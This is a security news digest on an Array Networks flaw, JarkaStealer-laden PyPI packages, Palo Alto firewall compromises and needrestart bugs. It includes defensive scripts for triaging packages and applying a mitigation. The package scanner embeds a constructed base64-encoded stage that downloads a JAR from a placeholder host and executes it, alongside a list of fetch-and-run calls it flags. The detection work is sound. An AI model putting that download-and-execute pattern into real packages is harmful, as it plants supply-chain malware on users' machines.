Programmer’s Digest #110

11/20/2024-11/27/2024 Critical “Array Networks” Flaw, PyPI Attack, Palo Alto Networks Firewalls Compromised And More.

1. CISA Urges Agencies to Patch Critical “Array Networks” Flaw Amid Active Attacks

CISA has added a critical vulnerability in Array Networks AG and vxAG secure access gateways (CVE-2023-28461) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. The flaw (CVSS score: 9.8) allows unauthenticated remote code execution via a vulnerable URL and was patched in March 2023 (version 9.4.0.484). Trend Micro linked exploitation of the vulnerability to the China-based cyber espionage group Earth Kasha, which targets Japanese entities and, increasingly, Taiwan, India, and Europe. Earth Kasha has previously exploited flaws in Array AG, Proself, and Fortinet FortiOS for initial access. ESET recently exposed a campaign by the group that used the upcoming World Expo 2025 as a lure to deliver malware. CISA requires federal agencies to apply the patch by December 16, 2024. Over 440,000 internet-exposed systems remain at risk.

2. PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries

Researchers have identified two malicious packages on the Python Package Index (PyPI), gptplus and claudeai-eng, that impersonated the OpenAI ChatGPT and Anthropic Claude models to distribute the information stealer JarkaStealer. Uploaded by “Xeroline” in November 2023, the packages attracted over 3,500 downloads before they were removed. Marketed as tools for accessing the GPT-4 Turbo and Claude AI APIs, they concealed code that deployed the malware on installation. The packages’ __init__.py file contained encoded code that downloaded a Java-based stealer, JavaUpdater.jar, from GitHub and installed a Java Runtime Environment if one was missing. Once running, JarkaStealer harvested sensitive data, including browser data, screenshots, and application session tokens for Telegram, Discord, and Steam. The stolen data was archived, sent to the attacker’s server, and then deleted from the victim’s system. JarkaStealer is sold as malware-as-a-service (MaaS) for $20–$50 on Telegram, and its source code has also leaked online.
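The pattern described above (an encoded stage inside __init__.py that fetches a second-stage binary and runs it at import time) is cheap to triage statically. The script below is an added illustration of my own, not tooling from the researchers or from PyPI: it parses a module with the standard ast module, keeps only statements that execute at import time, flags exec()/eval() of a non-literal argument, decodes base64 literals passed to exec() and scans the decoded payload the same way, and flags network-fetch and process-spawn calls. The two module sources embedded at the bottom are constructed stand-ins for the pattern, not the real gptplus or claudeai-eng code, and the URLs in them are placeholders.

```python
"""Static triage of __init__.py files for import-time download-and-run payloads.

Added example, not code from the researchers or the packages discussed.
The sample modules below are constructed, not real package contents.
"""
import ast
import base64
from dataclasses import dataclass
from pathlib import Path

# Calls that should rarely run at import time in a thin API wrapper.
DYNAMIC_EXEC = {"exec", "eval"}
FETCH_OR_RUN = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
}
DECODERS = {"base64.b64decode", "b64decode"}


@dataclass
class Finding:
    line: int      # line in the file being triaged (outer file for nested payloads)
    reason: str


def _dotted(node):
    """Render a Name/Attribute chain such as subprocess.Popen as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _decode_literal(node):
    """If node is base64.b64decode(<literal>), return the decoded text, else None."""
    if (isinstance(node, ast.Call) and _dotted(node.func) in DECODERS
            and node.args and isinstance(node.args[0], ast.Constant)):
        try:
            return base64.b64decode(node.args[0].value).decode("utf-8", "replace")
        except (ValueError, TypeError):
            return None
    return None


def triage_init(source, depth=0):
    """Return findings for code that runs when the module is imported."""
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return [Finding(0, "payload is not valid Python; inspect manually")]
    for stmt in tree.body:
        # Function and class bodies only run when called, not on import.
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            name = _dotted(node.func)
            if name in DYNAMIC_EXEC and node.args and not isinstance(node.args[0], ast.Constant):
                findings.append(Finding(node.lineno, f"{name}() of a non-literal argument at import time"))
                inner = _decode_literal(node.args[0])
                if inner is not None and depth < 3:  # unwrap nested encoded stages
                    for f in triage_init(inner, depth + 1):
                        findings.append(Finding(node.lineno, f"inside decoded payload: {f.reason}"))
            elif name in FETCH_OR_RUN:
                findings.append(Finding(node.lineno, f"{name}() at import time"))
    return findings


def verdict(source):
    return "review" if triage_init(source) else "ok"


def scan_tree(root):
    """Triage every __init__.py below root (for example a venv's site-packages)."""
    report = {}
    for init in Path(root).rglob("__init__.py"):
        try:
            findings = triage_init(init.read_text(errors="replace"))
        except OSError:
            continue
        if findings:
            report[str(init)] = findings
    return report


# Constructed stand-in for the described pattern: an encoded stage that fetches
# a JAR and runs it with java. Placeholder URL; not the real package code.
_STAGE2 = b'''import urllib.request, subprocess
urllib.request.urlretrieve("https://example.invalid/JavaUpdater.jar", "/tmp/JavaUpdater.jar")
subprocess.Popen(["java", "-jar", "/tmp/JavaUpdater.jar"])
'''
MALICIOUS_INIT = (
    "import base64\n"
    "__version__ = '1.0'\n"
    f"exec(base64.b64decode({base64.b64encode(_STAGE2)!r}))\n"
)

# Constructed benign wrapper: network access only inside a function the caller invokes.
BENIGN_INIT = '''import json
import urllib.request

API = "https://api.example.invalid/v1/chat"

def chat(prompt, api_key):
    req = urllib.request.Request(API, data=json.dumps({"prompt": prompt}).encode(),
                                 headers={"Authorization": "Bearer " + api_key})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
'''

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, fs in scan_tree(sys.argv[1]).items():
            print(path, [f"{f.line}: {f.reason}" for f in fs])
    else:
        for label, src in (("constructed malicious", MALICIOUS_INIT), ("constructed benign", BENIGN_INIT)):
            print(label, verdict(src), [f.reason for f in triage_init(src)])
```

Run it with a site-packages path to triage installed packages, or with no arguments to see the two constructed samples classified. The check is deliberately narrow (import-time code only) so that ordinary client libraries, which do their network calls inside functions, do not drown the report; a package that passes it still deserves the usual review of its setup.py and wheel contents.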

3. 2,000 Palo Alto Networks Firewalls Compromised

A recent campaign exploiting two vulnerabilities has compromised around 2,000 Palo Alto Networks firewalls, according to Shadowserver researchers. The flaws are a critical authentication bypass (CVE-2024-0012, CVSS 9.3) and a medium-severity privilege escalation bug (CVE-2024-9474, CVSS 6.9), which can be chained. CVE-2024-0012 lets an unauthenticated attacker with network access to the management web interface gain administrator privileges, tamper with the configuration, or go on to exploit CVE-2024-9474. The flaws, disclosed earlier in November, affect certain PAN-OS 10.2–11.2 deployments on PA-Series, VM-Series, and CN-Series firewalls and on Panorama, but not Cloud NGFW or Prisma Access.

Palo Alto Networks disputes Shadowserver’s numbers, stating fewer than 0.5% of customer firewalls have internet-exposed interfaces and that the impact is “limited.” The company emphasizes securing management interfaces to reduce risks. 

4. Decades-Old Security Vulnerabilities Found in Ubuntu’s Needrestart Package

The Qualys Threat Research Unit (TRU) has uncovered five Local Privilege Escalation (LPE) vulnerabilities in Ubuntu’s needrestart package, enabling local attackers to gain root privileges without user interaction. The flaws, introduced in version 0.8 (April 2014), affect Ubuntu Server systems with needrestart installed by default since version 21.04.

The vulnerabilities are tracked as CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003. They allow attackers to execute arbitrary code as root by exploiting issues with interpreter environment variables (Python/Ruby) or race conditions.

Qualys warns that these vulnerabilities, with CVSS scores up to 7.8, are highly exploitable and could soon see public exploits, posing severe risks like unauthorized access, malware, and system compromise.

As a workaround, interpreter scanning can be disabled by adding $nrconf{interpscan} = 0; to /etc/needrestart/needrestart.conf. The fix is the updated package: enterprises should update needrestart promptly to avoid operational disruptions and data breaches.
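The following Python script is an added example of mine, not code from Qualys or the needrestart project. It audits whether the workaround above is active in the Perl-syntax needrestart.conf (an uncommented $nrconf{interpscan} = 0; line), applies it idempotently, and lists processes whose environment carries PYTHONPATH or RUBYLIB, the interpreter variables the scan honoured and the reason an unprivileged user's environment could steer code loaded as root. The config path and directive are the ones the advisory names; the helper names and the sample inputs in the comments are this script's own assumptions.

```python
"""Audit and apply the needrestart interpreter-scan workaround.

Added example, not Qualys's or needrestart's own code. Requires root to
write /etc/needrestart/needrestart.conf and to read other users' /proc/<pid>/environ.
"""
import os
import re
from pathlib import Path

CONF_PATH = Path("/etc/needrestart/needrestart.conf")
DIRECTIVE = "$nrconf{interpscan} = 0;"
# Matches an active (uncommented) directive on any line of the Perl-syntax conf.
_DISABLED_RE = re.compile(r"^\s*\$nrconf\{interpscan\}\s*=\s*0\s*;", re.MULTILINE)
# Environment variables that change which code the Python/Ruby interpreters load.
INTERP_VARS = ("PYTHONPATH", "RUBYLIB")


def interpscan_disabled(conf_text):
    """True if conf_text already turns interpreter scanning off."""
    return _DISABLED_RE.search(conf_text) is not None


def harden_conf_text(conf_text):
    """Return conf_text with the directive appended unless it is already active."""
    if interpscan_disabled(conf_text):
        return conf_text
    sep = "" if not conf_text or conf_text.endswith("\n") else "\n"
    return f"{conf_text}{sep}{DIRECTIVE}\n"


def disable_interpscan(path=CONF_PATH):
    """Apply the workaround on disk; returns True if the file changed."""
    old = path.read_text() if path.exists() else ""
    new = harden_conf_text(old)
    if new != old:
        path.write_text(new)
        return True
    return False


def interp_vars_in_environ(blob):
    """Parse a NUL-separated /proc/<pid>/environ blob for the interpreter variables.

    Constructed input such as b"PATH=/bin\\0PYTHONPATH=/tmp/x\\0" yields {"PYTHONPATH": "/tmp/x"}.
    """
    found = {}
    for entry in blob.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        name = key.decode(errors="replace")
        if sep and name in INTERP_VARS:
            found[name] = value.decode(errors="replace")
    return found


def pids_with_interp_env(proc_root="/proc"):
    """Map pid -> interpreter variables for every process whose environ is readable."""
    hits = {}
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            blob = Path(proc_root, name, "environ").read_bytes()
        except OSError:  # permission denied, or the process has already exited
            continue
        found = interp_vars_in_environ(blob)
        if found:
            hits[int(name)] = found
    return hits


if __name__ == "__main__":
    if CONF_PATH.exists():
        print("interpscan disabled:", interpscan_disabled(CONF_PATH.read_text()))
    else:
        print("conf not found:", CONF_PATH)
    if os.path.isdir("/proc"):
        for pid, found in sorted(pids_with_interp_env().items()):
            print(pid, found)
```

Running the script as root reports the workaround's state and any processes whose environment already carries the variables; calling disable_interpscan() appends the directive once and leaves an already-hardened file untouched. The workaround only removes the interpreter-scan path; the package update remains the fix.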
